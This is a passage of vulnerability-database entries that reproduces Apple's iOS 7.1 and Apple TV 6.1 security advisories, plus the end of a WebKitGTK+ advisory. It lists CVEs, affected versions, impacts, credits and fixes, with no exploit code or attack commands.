Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1335
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1336
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1337
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1338
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1339
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Atte Kettunen of OUSPG.
CVE-2014-1341
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1342
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
CVE-2014-1343
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Google Chrome Security Team.
CVE-2014-1731
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to an anonymous member of the Blink development community.
core/html/HTMLSelectElement.cpp in the DOM implementation in Blink,
as used in Google Chrome before 34.0.1847.131 on Windows and OS X
and before 34.0.1847.132 on Linux, does not properly check renderer
state upon a focus event, which allows remote attackers to cause a
denial of service or possibly have unspecified other impact via
vectors that leverage "type confusion" for SELECT elements.
CVE-2014-1346
Versions affected: WebKitGTK+ 2.4.X before 2.4.2.
Credit to Erling Ellingsen of Facebook.
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4,
does not properly interpret Unicode encoding, which allows remote
attackers to spoof a postMessage origin, and bypass intended
restrictions on sending a message to a connected frame or window,
via crafted characters in a URL.
CVE-2014-1344
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
Credit to Ian Beer of Google Project Zero.
CVE-2014-1384
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1385
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1387
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
Credit to Google Chrome Security Team.
CVE-2014-1388
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1389
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
CVE-2014-1390
Versions affected: WebKitGTK+ 2.4.X before 2.4.8.
For the 2.4 series, these problems have been fixed in release 2.4.8.
Further information about WebKitGTK+ Security Advisories can be found
at: http://webkitgtk.org/security.html
The WebKitGTK+ team,
January 26, 2015
| VAR-201403-0260 | CVE-2014-1280 | Apple iOS and Apple TV Service disruption in Japanese video drivers (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Video Driver in Apple iOS before 7.1 and Apple TV before 6.1 allows remote attackers to cause a denial of service (NULL pointer dereference and device hang) via a crafted video file with MPEG-4 encoding. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Apple iOS and TV are prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
The following products are vulnerable:
Apple iOS versions prior to 7.1
Apple TV versions prior to 6.1. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvfAAoJEPefwLHPlZEw8GEP/ikatTiohUPRvpjubarcXePV
z6ixKxmqUUvSy+AlyFTsCpvB1IEipSx5hKbYsxk5+4qAVsYG3VEpLNJKBarUHQN8
K1+I77xF5osLxrypWV6vEDqqFDcZyflumtvfdj7EmWf/FcWnOooRQt7wVVrzrCCh
40nfspy1YjNi1EO2p6dDlzi+yvEGF5CHg8R1zSFf7ozLPoCABlnbdzXxh+nYoI+E
y65R4Eo7OBhVH5mJvBczjsHu/GljR3y/yi3NSnoV5ga5SfaaOlwa8emgNooeEs3u
ghkfm2UxkjtdNkpVMfwFp35oLESIl6pMd2dtH2sU4MwRK3h8rvFeS/zJRZmwEIXO
5+9tNop1hmF52aVKRZAJ4/A9kbTC3pKd0PxvKsveB6Pgxbq9eDfueMC/r6FtOZDa
is95LuLtf26h8xQt8FovY7Cm80ckOT4mJnvzfmpGmUSK4PHsNfJwfJOBa1yMHTJg
CDfg+jGhHy7DJuawekzQjcvkz34YWg7Lp25ZJilvZf8dGB2R4g+hikdOrWKI4vFj
x7LGZg6IPaHFt0MPgjnoV1FhABnXksD41uIAQP2LhDrHWnRgTeJoGwQ2SuZjSA6w
T/DzhicTLq6MDSBjlbt6EJ4gtxWlYDfeAfJcFb/Aret+2L7570q18EkLRbiI8e6k
3NksAqBIKSpadFt+M8wt
=xjrI
-----END PGP SIGNATURE-----
| VAR-201403-0259 | CVE-2014-1279 | Apple TV Vulnerability in which important information is obtained |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
Apple TV before 6.1 does not properly restrict logging, which allows local users to obtain sensitive information by reading log data. Apple TV is prone to a local information-disclosure vulnerability.
An attacker with physical access can exploit this issue to obtain sensitive information that may lead to further attacks.
Versions prior to Apple TV 6.1 are vulnerable. It can watch TV programs online through Apple TV, and may also transfer photos, videos and music from iPad, iPhone, iPod and PC to the TV. play. The vulnerability is caused by the program not properly restricting access to logs. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-2 Apple TV 6.1
Apple TV 6.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with access to an Apple TV may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-1279 : David Schuetz working at Intrepidus Group
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
WebKit
Available for: Apple TV 2nd generation and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvfAAoJEPefwLHPlZEw8GEP/ikatTiohUPRvpjubarcXePV
z6ixKxmqUUvSy+AlyFTsCpvB1IEipSx5hKbYsxk5+4qAVsYG3VEpLNJKBarUHQN8
K1+I77xF5osLxrypWV6vEDqqFDcZyflumtvfdj7EmWf/FcWnOooRQt7wVVrzrCCh
40nfspy1YjNi1EO2p6dDlzi+yvEGF5CHg8R1zSFf7ozLPoCABlnbdzXxh+nYoI+E
y65R4Eo7OBhVH5mJvBczjsHu/GljR3y/yi3NSnoV5ga5SfaaOlwa8emgNooeEs3u
ghkfm2UxkjtdNkpVMfwFp35oLESIl6pMd2dtH2sU4MwRK3h8rvFeS/zJRZmwEIXO
5+9tNop1hmF52aVKRZAJ4/A9kbTC3pKd0PxvKsveB6Pgxbq9eDfueMC/r6FtOZDa
is95LuLtf26h8xQt8FovY7Cm80ckOT4mJnvzfmpGmUSK4PHsNfJwfJOBa1yMHTJg
CDfg+jGhHy7DJuawekzQjcvkz34YWg7Lp25ZJilvZf8dGB2R4g+hikdOrWKI4vFj
x7LGZg6IPaHFt0MPgjnoV1FhABnXksD41uIAQP2LhDrHWnRgTeJoGwQ2SuZjSA6w
T/DzhicTLq6MDSBjlbt6EJ4gtxWlYDfeAfJcFb/Aret+2L7570q18EkLRbiI8e6k
3NksAqBIKSpadFt+M8wt
=xjrI
-----END PGP SIGNATURE-----
| VAR-201403-0256 | CVE-2014-1276 | Apple iOS Vulnerabilities in which user operations on arbitrary apps are monitored |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IOKit HID Event in Apple iOS before 7.1 allows attackers to conduct user-action monitoring attacks against arbitrary apps via a crafted app that accesses an IOKit framework interface. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
FaceTime
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
access FaceTime contacts from the lock screen
Description: FaceTime contacts on a locked device could be exposed
by making a failed FaceTime call from the lock screen. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor on user actions in other
apps
Description: An interface in IOKit framework allowed malicious apps
to monitor on user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvJAAoJEPefwLHPlZEwh2cP/iOvfDbgv78TKX2hsxttcy8l
NTK4EbpYO0rEpqbQukIHwBrb+PtEWK4tdxWPNQV+8GnCPaLqmMXWxHZPkI02qXjI
UxYNgPq+9MPcoFFdbbptz4azcwFa0rdsQtxL0MYRrUqW5ml86zjGsVWUDGMDFu9R
fuujvU/JOGoIYVxFQziEScnMfryw61b/JObcT/mDzXv/IcKhuMzMfp4cbnXq7Mmx
NOpIQ0syx5oH7jadJA72iX7UyUuoydAcD3gaJDbLLfjEM8giDTL/TmH1HpuJjDHq
Zmj0NMlMqAztoFzpHZxlJ6kYjFYs7heyWgm3HQ+dwT0cDajFEZUEJGuBBO+P6dwp
cVlhDJ87crsP2ctUn46EUGFw5fFZRPEUqm4r0M/3o8z2ZPDqFxIBwMHEEV2LJtuN
lKjHYYWTO9BZOg87pm/HLpNqqTEz7J1eDWVJiRh5kZarp8w5KgZhBhYkltlPKwOo
Uh1SvUH+CjgNQTObSLv+e2EJ0So8gi3xBGHOrOdcof33fTsyL4WDvHEIvs4l1jUY
f29uha46K3dVZpJtFV3xTiwm6fodWgTR4xhWSAAVI2V8V4KLQMEHu7+eV+cURmme
JLdVgzxXw0uZHP874Uy60qR+6KBdEkIvgAoDHmd9jLnZMJTQAcn7PjcZz2z/V25u
3bQ2RrEc85Xqs7adpinL
=W1ik
-----END PGP SIGNATURE-----
| VAR-201403-0254 | CVE-2014-1274 | Apple iOS of FaceTime Important in FaceTime Vulnerability for obtaining contact information |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
FaceTime in Apple iOS before 7.1 allows physically proximate attackers to obtain sensitive FaceTime contact information by using the lock screen for an invalid FaceTime call. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
